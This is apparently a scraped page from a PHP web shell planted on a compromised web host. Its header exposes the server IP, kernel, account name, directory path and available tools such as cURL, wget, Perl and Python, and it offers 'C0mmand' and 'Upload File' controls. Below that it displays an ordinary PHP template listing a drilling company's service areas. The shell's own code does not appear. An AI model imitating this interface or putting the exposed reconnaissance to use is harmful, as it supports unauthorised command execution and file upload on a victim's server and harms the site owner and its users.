Server IP : 103.53.40.154 / Your IP : 18.119.125.61 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/pilingdrillingservices.com/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!--.........area section......--> <section style="background-color: #f4f4f4;margin-top:20px;padding-top:20px;padding-bottom:20px" class="area-section"> <div class="container "> <h1 style="color:#ED4B41" class="text-center ">Area We Cover</h1> <div style="" class="row "> <?php include_once 'admin/config.php'; $sqls = "SELECT * FROM tb5_services"; $runs = mysqli_query($db,$sqls); while($datas = mysqli_fetch_assoc($runs)){ ?> <div class="col-md-3 col-sm-3"> <a href="<?php echo $wspath?>area<?php echo $datas['slug_url']?>.html"><b style="padding-bootom:10px; color:#ed4b41; font-size:16px;"><i class="fa fa-arrow-right"></i><?php echo $datas['src_name']?></b></a> </div> <?php } ?> </div> </div> </section> <!--<section style="background-color: #f4f4f4;margin-top:20px;padding-top:20px;padding-bottom:20px" class="area-section2">--> <!-- <div class="container ">--> <!-- <h1 style="color:#ED4B41" class="text-center ">Area We Cover</h1>--> <!-- <div style="" class="row ">--> <!-- <div class="col"><a href="service-page.php">Bhiwani</a></div>--> <!-- <div class="col"><a href="service-page.php">Haryana</a></div>--> <!-- <div class="col"><a href="service-page.php">Rohtak</a></div>--> <!-- <div class="col"><a href="service-page.php">Sonipat</a></div>--> <!-- <div class="col"><a href="service-page.php">Ghaziabad</a></div>--> <!-- <div class="col"><a href="service-page.php">Delhi</a></div>--> <!-- </div>--> <!-- </div>--> <!--</section>-->